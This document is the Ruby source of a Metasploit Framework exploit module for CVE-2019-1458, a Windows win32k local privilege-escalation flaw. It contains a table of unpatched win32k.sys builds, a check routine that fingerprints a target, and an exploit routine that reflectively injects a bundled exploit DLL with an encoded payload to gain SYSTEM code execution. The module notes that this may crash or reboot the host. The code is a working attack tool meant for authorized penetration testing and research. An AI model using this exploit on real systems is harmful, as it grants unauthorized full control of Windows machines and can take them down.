GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/local/cve_2019_1458_wizardopium.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
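class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  prepend Msf::Exploit::Remote::AutoCheck

  # win32k.sys file-version ranges still missing the fix for CVE-2019-1458.
  # Each entry is [first affected build, first fixed build, OS label]; a build
  # counts as vulnerable when first <= build < fixed.
  # Build numbers taken from https://www.qualys.com/research/security-alerts/2019-12-10/microsoft/
  VULNERABLE_WIN32K_RANGES = [
    ['6.0.6000.0', '6.0.6003.20692', 'Windows Vista and Windows Server 2008'],
    ['6.1.7600.0', '6.1.7601.24540', 'Windows 7 and Windows Server 2008 R2'],
    ['6.2.9200.0', '6.2.9200.22932', 'Windows 8 and Windows Server 2012'],
    ['6.3.9600.0', '6.3.9600.19574', 'Windows 8.1 and Windows Server 2012 R2'],
    ['10.0.10240.0', '10.0.10240.18427', 'Windows 10 v1507'],
    # NOTE(review): the upper bound for v1511 is open-ended in the original
    # table, i.e. every 10586 build is treated as unpatched - presumably no fix
    # was published for that branch; confirm against the vendor advisory.
    ['10.0.10586.0', '10.0.10586.99999', 'Windows 10 v1511'],
    ['10.0.14393.0', '10.0.14393.3383', 'Windows 10 v1607']
  ].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft Windows Uninitialized Variable Local Privilege Elevation',
        'Description' => %q{
          This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability
          within win32k which occurs due to an uninitialized variable, which allows user mode attackers
          to write a limited amount of controlled data to an attacker controlled address
          in kernel memory. By utilizing this vulnerability to execute controlled writes
          to kernel memory, an attacker can gain arbitrary code execution
          as the SYSTEM user.

          This module has been tested against Windows 7 x64 SP1. Offsets within the
          exploit code may need to be adjusted to work with other versions of Windows.
          The exploit can only be triggered once against the target and can cause the
          target machine to reboot when the session is terminated.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'piotrflorczyk', # poc
          'unamer', # exploit
          'timwr', # msf module
        ],
        'Platform' => 'win',
        'SessionTypes' => ['meterpreter'],
        'Targets' => [
          ['Windows 7 x64', { 'Arch' => ARCH_X64 }]
        ],
        'Notes' => {
          'Stability' => [ CRASH_OS_RESTARTS ],
          'Reliability' => [ UNRELIABLE_SESSION ],
          'SideEffects' => [ IOC_IN_LOGS ]
        },
        'References' => [
          ['CVE', '2019-1458'],
          ['URL', 'https://github.com/unamer/CVE-2019-1458'],
          ['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'],
          ['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'],
          ['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html']
        ],
        'DisclosureDate' => '2019-12-10',
        'DefaultTarget' => 0,
        'AKA' => [ 'WizardOpium' ]
      )
    )
  end

  # Decides from the win32k.sys file version whether the session's host is
  # still unpatched for CVE-2019-1458.
  #
  # Returns CheckCode::Safe for non-Windows sessions and for builds outside
  # every vulnerable range, CheckCode::Unknown when the file version cannot be
  # read, and CheckCode::Appears when the build falls inside a range in
  # VULNERABLE_WIN32K_RANGES.
  #
  # The version table is deliberately wider than this module's only target
  # (Windows 7 x64): a host can be vulnerable yet not exploitable by this
  # module (32-bit, or a build the bundled offsets were not written for), so a
  # warning is printed in those cases rather than a false Safe.
  def check
    # Non-Windows systems are definitely not affected.
    return CheckCode::Safe unless session.platform == 'windows'

    file_path = expand_path('%WINDIR%\\system32\\win32k.sys')
    version_info = file_version(file_path)
    # Guard against a failed version lookup (assumed to come back as nil -
    # TODO confirm in the FileInfo mixin); without this, nil fields would be
    # interpolated into a malformed version string and Rex::Version would raise.
    if version_info.nil?
      vprint_error("Could not read the file version of #{file_path}")
      return CheckCode::Unknown
    end

    major, minor, build, revision, branch = version_info
    vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")

    installed = Rex::Version.new("#{major}.#{minor}.#{build}.#{revision}")
    matched = VULNERABLE_WIN32K_RANGES.find do |first_affected, first_fixed, _label|
      installed >= Rex::Version.new(first_affected) && installed < Rex::Version.new(first_fixed)
    end
    return CheckCode::Safe if matched.nil?

    os_label = matched[2]
    vprint_status("win32k.sys build is in the unpatched range for #{os_label}")

    # The host is vulnerable, but the bundled exploit.dll only carries offsets
    # for the Windows 7 x64 target; tell the operator before AutoCheck lets
    # them pull the trigger on something else.
    unless sysinfo['Architecture'] == ARCH_X64
      print_warning('Target appears vulnerable, but this module only supports x64 (Windows 7 x64 target)')
    end
    unless os_label.start_with?('Windows 7')
      print_warning("Target appears vulnerable (#{os_label}), but this module was only tested on Windows 7 x64 SP1; exploit offsets may need adjusting")
    end

    CheckCode::Appears
  end

  # Reflectively loads the precompiled exploit DLL into the current process
  # and hands it the encoded payload; on success the DLL runs the payload as
  # SYSTEM.
  #
  # Fails with Failure::None when the session is already SYSTEM, with
  # Failure::NoTarget on a non-x64 host, and with Failure::NotFound when the
  # DLL is missing from the data directory. The trigger is one-shot and can
  # take the host down when the session ends (see the module description), so
  # a warning is printed before it fires.
  def exploit
    fail_with(Failure::None, 'Session is already elevated') if is_system?

    unless sysinfo['Architecture'] == ARCH_X64
      fail_with(Failure::NoTarget, 'Running against 32-bit systems is not supported')
    end

    dll_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2019-1458', 'exploit.dll')
    # Fail cleanly instead of surfacing a raw file-read exception from the
    # injection mixin when the data file is absent.
    unless ::File.file?(dll_path)
      fail_with(Failure::NotFound, "Exploit DLL not found: #{dll_path}")
    end

    print_warning('This exploit can only be triggered once against the target and may reboot it when the session is terminated')

    # Invoke the exploit, passing in the payload that we want executed on
    # successful exploitation. The argument buffer is a 32-bit little-endian
    # length prefix followed by the payload bytes.
    print_status('Triggering the exploit...')
    encoded_payload = payload.encoded
    execute_dll(dll_path, [encoded_payload.length].pack('I<') + encoded_payload)

    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end
end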